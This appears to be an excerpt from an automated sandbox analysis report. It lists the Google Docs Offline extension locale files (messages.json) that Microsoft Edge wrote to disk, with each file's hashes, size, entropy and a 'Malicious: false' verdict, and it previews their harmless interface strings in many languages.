MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
